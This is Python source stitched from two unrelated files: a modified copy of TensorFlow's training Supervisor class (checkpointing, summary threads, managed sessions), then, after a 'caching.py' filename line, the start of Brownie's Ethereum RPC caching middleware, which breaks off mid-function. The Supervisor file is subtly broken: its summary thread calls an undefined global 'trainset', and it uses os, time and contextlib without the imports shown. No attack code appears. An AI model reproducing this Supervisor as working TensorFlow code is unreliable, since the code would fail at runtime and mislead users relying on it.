from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitialize variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
@{tf.train.Server.create_local_server} for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific host, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess, ))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optionally `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()` If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`,
the model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all global variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saved returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Default to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = _summary.FileWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [
variables.local_variables_initializer(),
lookup_ops.tables_initializer()
]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If not `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_service` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
logging.info("Starting standard services.")
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
logging.info("Starting queue runners.")
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if not checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step], feed_dict=trainset.get_feed_dict(dest='summary'))
else:
summary_strs = self._sess.run(self._sv.summary_op, feed_dict=trainset.get_feed_dict(dest='summary'))
global_step = None
if self._sv.summary_writer:
logging.info("Recording summary at step %s.", global_step)
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess, step_counter=None):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
step_counter: A `Tensor` holding the step counter. By defaults, it uses
sv.global_step.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
step_counter = sv.global_step if step_counter is None else step_counter
self._step_counter = step_counter
self._summary_tag = "%s/sec" % self._step_counter.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._step_counter)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._step_counter)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
if elapsed_time > 0.:
steps_per_sec = added_steps / elapsed_time
else:
steps_per_sec = float("inf")
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
logging.info("Saving checkpoint to path %s", self._sv.save_path)
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
caching.py
|
import json
import threading
import time
from collections import OrderedDict
from typing import Any, Callable, Dict, List, Optional
from hexbytes import HexBytes
from web3 import Web3
from brownie._config import CONFIG, _get_data_folder
from brownie.network.middlewares import BrownieMiddlewareABC
from brownie.utils.sql import Cursor
# calls to the following RPC endpoints are stored in a persistent cache
# if the returned data evaluates true when passed into the lambda
LONGTERM_CACHE = {
"eth_getCode": lambda w3, data: is_cacheable_bytecode(w3, data),
}
def _strip_push_data(bytecode: HexBytes) -> HexBytes:
idx = 0
while idx < len(bytecode):
# if instruction is between PUSH1 and PUSH32
if 0x60 <= bytecode[idx] <= 0x7F:
offset = idx + 1
length = bytecode[idx] - 0x5F
bytecode = HexBytes(bytecode[:offset] + bytecode[offset + length :])
idx += 1
return bytecode
def is_cacheable_bytecode(web3: Web3, bytecode: HexBytes) -> bool:
"""
Check if bytecode can safely by cached.
To safely cache bytecode we verify that the code cannot be removed via a
SELFDESTRUCT operation, or a SELFDESTRUCT triggered via a DELEGATECALL.
Arguments
---------
web3 : Web3
Web3 object connected to the same network that the bytecode exists on.
bytecode : HexBytes
Deployed bytecode to be analyzed.
Returns
-------
bool
Can this bytecode be cached?
"""
if not bytecode:
# do not cache empty code, something might be deployed there later!
return False
bytecode = HexBytes(bytecode)
opcodes = _strip_push_data(bytecode)
if 0xFF in opcodes:
# cannot cache if the code contains a SELFDESTRUCT instruction
return False
for idx in [i for i in range(len(opcodes)) if opcodes[i] == 0xF4]:
# cannot cache if the code performs a DELEGATECALL to a not-fixed address
if idx < 2:
return False
if opcodes[idx - 2 : idx] != HexBytes("0x735A"):
# if the instruction not is immediately preceded by PUSH20 GAS
# the target was not hardcoded and we cannot cache
return False
# check if the target code of each delegatecall is also cachable
# if yes then we can cache this contract as well
push20_indexes = [
i for i in range(len(bytecode) - 22) if bytecode[i] == 0x73 and bytecode[i + 22] == 0xF4
]
for address in [bytecode[i + 1 : i + 21] for i in push20_indexes]:
if not int(address.hex(), 16):
# if the delegatecall targets 0x00 this is a factory pattern, we can ignore
continue
